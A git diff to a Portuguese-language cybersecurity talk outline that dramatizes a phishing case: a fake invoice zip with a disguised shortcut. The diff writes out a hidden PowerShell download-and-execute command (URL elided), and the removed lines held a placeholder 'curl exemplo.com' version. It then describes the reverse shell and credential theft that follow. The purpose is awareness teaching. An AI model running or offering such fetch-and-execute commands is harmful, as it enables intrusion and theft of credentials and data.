diff --git a/Palestras/Cybersegurança na prática.md b/Palestras/Cybersegurança na prática.md index 8fb302c..8a8ebb7 100644 --- a/Palestras/Cybersegurança na prática.md +++ b/Palestras/Cybersegurança na prática.md @@ -14,7 +14,7 @@ Cybersegurança não é hoodie + tela verde. - Não é força bruta cinematográfica. - É entender como o sistema funciona melhor que quem construiu. -Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona +Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona. ### Exercício mental Eu quero invadir sua casa. Quem eu chamo? @@ -42,8 +42,108 @@ Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente r > "Conheça seu inimigo" ### Exemplo de caso real -Um CEO de uma empresa de Uberlândia está sentado no seu escritório fazendo seu trabalho. De vez em quando conversa com os funcionários. Reclama que o ar condicionado está muito fraco. Enquanto isso ele checa seus emails. Dentro deles há um email que passaria despercebido. "Nota fiscal da Empresa X (inventar)". Inocentemente ele abre, baixa o arquivo zip, e dentro tem um arquivo. `nf-210230120310240102.pdf`. O que ele não percebe é que não é um arquivo PDF, e sim um link para um endereço peculiar. Esse endereço não é da internet, e sim uma linha de comando. -`powershell curl exemplo.com | execute` (melhorar). Sem perceber, ele abre. Uma tela do prompt de comando pisca em sua tela por um segundo. Pronto. Agora hackers tem acesso à sua máquina. Podem passar dias despercebidos enquanto colhem inteligência, dados de clientes, e qualquer outra informação que possa ser útil no futuro para extorquir ou aplicar golpes à empresa. +## Caso real (adaptado) +Uberlândia, 14h37. + +O CEO de uma empresa local está no escritório. +Reuniões pela manhã. +Planilhas abertas. +WhatsApp Web piscando. +Ar-condicionado fraco — ele comenta com alguém da equipe. + +No meio disso, ele confere os e-mails. + +Assunto: +"Nota Fiscal – Fornecedor Atlas Comercial LTDA" + +Nada estranho. +A empresa realmente tem fornecedores. +O layout do e-mail parece normal. +Assinatura, CNPJ, telefone. +Tudo plausível. + +Ele abre. + +Anexo: +nf-210230120310240102.zip + +Ele extrai. + +Dentro: +nf-210230120310240102.pdf + +Ícone de PDF. +Nome de PDF. +Extensão de PDF. + +Ele dá dois cliques. + +Por menos de um segundo, +uma janela preta pisca na tela. + +Ele nem percebe. +Acredita que o arquivo corrompeu. +Fecha. +Volta para o trabalho. + +O que ele não viu: + +O arquivo não era um PDF. +Era um atalho disfarçado. +Um pequeno script. + +Algo equivalente a: + +powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression" + +Em português simples: + +“Baixe código da internet. +Execute. +Não mostre nada.” + +Em menos de 3 segundos: + +- Um agente é instalado. +- A máquina estabelece conexão reversa. +- Um servidor externo agora pode enviar comandos. +- A sessão está ativa. + +Não houve: +- Exploit sofisticado. +- Zero-day. +- Quebra de criptografia. +- Força bruta. + +Só um clique. + +Nos dias seguintes: +- Credenciais salvas no navegador são extraídas. +- Tokens de sessão são copiados. +- Acesso ao sistema interno é mapeado. +- Pastas compartilhadas são indexadas. +- E-mails são lidos. +- Dados de clientes são copiados silenciosamente. + +Nada trava. +Nada quebra. +Nada avisa. + +Sem ransomware. +Sem tela vermelha. +Sem pedido de resgate. + +Só coleta. + +Meses depois, +a empresa descobre que seus dados estão sendo usados +para aplicar golpes em seus próprios clientes. + +A pergunta não é: +“Como invadiram?” + +A pergunta é: +Onde estava o parafuso solto? ## Parte 4: Vulnerabilidades do Mundo Real ### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.